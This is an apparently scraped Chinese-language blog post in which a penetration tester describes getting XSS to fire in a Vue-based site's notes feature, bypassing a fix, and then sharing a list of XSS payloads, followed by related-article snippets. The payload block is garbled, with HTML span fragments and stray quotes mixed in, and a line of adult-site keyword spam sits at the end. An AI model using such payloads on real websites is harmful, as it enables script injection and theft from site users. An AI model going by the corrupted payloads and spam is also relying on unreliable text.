<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    VUE站點的XSS漏洞實戰分享

    VSole2022-03-15 15:50:41

    最近在測試一個公司的業務系統,打開站點一看就知道是vue的框架:

    每次遇到VUE框架都是令我特別頭疼的事情,因為在這個框架下面XSS實在是不太好搞,基本都被和諧了,如果對vue了解一點的話都知道,在vue里面的v-mode是神一般的存在著,而v-html幾乎已經雞雞了。

    話不多說,看到整個頁面啥都沒有,唯一一個就是這個手記的功能,硬著頭皮嘗試一下吧。

    看到這個地方的時候,其實也沒法判斷到底能不能進行XSS,所以就試了一下。

    payload:alert(<span class="code-snippet__string" style="box-sizing: border-box;">"1"</span>)
    

    發現可以彈框,頓時信心加倍,這也是第一次彈了VUE的XSS。

    你以為這樣就結束了嗎?其實并沒有,研發反饋修復好了,復測繼續插。

    哈哈,成功繞過,這里需要說明一下嘗試了很多次才成功,具體的payload不太記得了,因此文章寫道這里算是一個小節吧,另外附上我自己本次測試過程中的payload系統對各位大佬有用。

    各人感覺如果遇到這種架構的,不妨可以嘗試一下XSS,下面是分享的一些XSS常用payload,僅供各位大佬參考:

    "true" "ondragenter=confirm(1)" src="alert(<span class="code-snippet__number" style="box-sizing: border-box;">1</span>)">test111""prompt(1)" contenteditable>test222"" autofocus tabindex=1>test
    ""true" ondragenter=confirm(1) style="width:100px,height:100px">test"1</span>)<span class="code-snippet__string" style="box-sizing: border-box;">">"
    "
    "
    "
    "
    "
    "test
    "test
    "
    
    xssvue
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    每次遇到VUE框架都是令我特別頭疼的事情,因為在這個框架下面XSS實在是不太好搞,基本都被和諧了,如果對vue了解一點的話都知道,在vue里面的v-mode是神一般的存在著,而v-html幾乎已經雞雞了。 話不多說,看到整個頁面啥都沒有,唯一一個就是這個手記的功能,硬著頭皮嘗試一下吧。
    XSS 的認識與防護策略
    2021-10-15 07:30:55
    防止 XSS 攻擊預防存儲型和反射型 XSS 攻擊存儲型和反射型 XSS 都是在服務端取出惡意代碼后,插入到響應 HTML 里的;因此預防這兩種漏洞,有兩種常見做法:對文本內容做充分轉義。禁止內聯腳本執行。禁止外域提交,網站被攻擊后,用戶的數據不會泄露到外域。
    隨著互聯網的高速發展,信息安全問題已經成為企業最為關注的焦點之一,而前端又是引發企業安全問題的高危據點。在移動互聯網時代,前端人員除了傳統的 XSS、CSRF 等安全問題之外,又時常遭遇網絡劫持、非法調用 Hybrid API 等新型安全問題。
    MCMS 審計之路
    2022-10-08 15:57:56
    MCMS 是 J2EE 系統,完整開源的Java CMS,基于SpringBoot 2架構,前端基于vue、element ui。為開發者提供上百套免費模板,同時提供適用的插件,一套簡單好用的開源系統、一整套優質的開源生態內容體系。十天前 MCMS 更新了新的一版本 5.2.9 提示新版本進行了 SQL 安全方面的優化,所以我們嘗試 審計 MCMS 5.2.8環境搭建我們下載好安裝包后利用 idea 打開項目創建數據庫 mcms,導入 doc/mcms-5.2.8.sql修改 src/main/resources/application-dev.yml 中關于數據庫設置參數運行MSApplication.java main方法利用賬戶名:密碼?
    業務邏輯漏洞挖掘
    2022-06-08 08:48:17
    一. 前言隨著各類前后端框架的成熟和完善,傳統的SQL注入、XSS等常規漏洞在Web系統里逐步減少,而攻擊者
    為了提高安全服務項目的檢測效率、規范性、全面性,Tide安全團隊結合在滲透測試行業的經驗和安全開發方面的積累,開發了一款自動化滲透測試工具。 該工具使用Golang開發為CS架構,集“資產探測-服務識別-爬蟲-被動監測-漏洞掃描-POC檢測-截屏-報告”于一體,適合甲方或乙方安服團隊對目標系統進行全面的安全檢測并輸出報告。 本文主要介紹一下該工具的框架及部分實現思路。
    業務漏洞挖掘筆記
    2022-04-03 21:16:10
    業務漏洞挖掘筆記多年的實戰業務漏洞挖掘經驗,為了讓今后的業務漏洞挖掘工作更清晰,以及盡可能的把重復性的工作自
    crawlergo是一個使用chrome headless模式進行URL收集的瀏覽器爬蟲。它對整個網頁的關鍵位置與DOM渲染階段進行HOOK,自動進行表單填充并提交,配合智能的JS事件觸發,盡可能的收集網站暴露出的入口。內置URL去重模塊,過濾掉了大量偽靜態URL,對于大型網站仍保持較快的解析與抓取速度,最后得到高質量的請求結果集合。調研1.
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类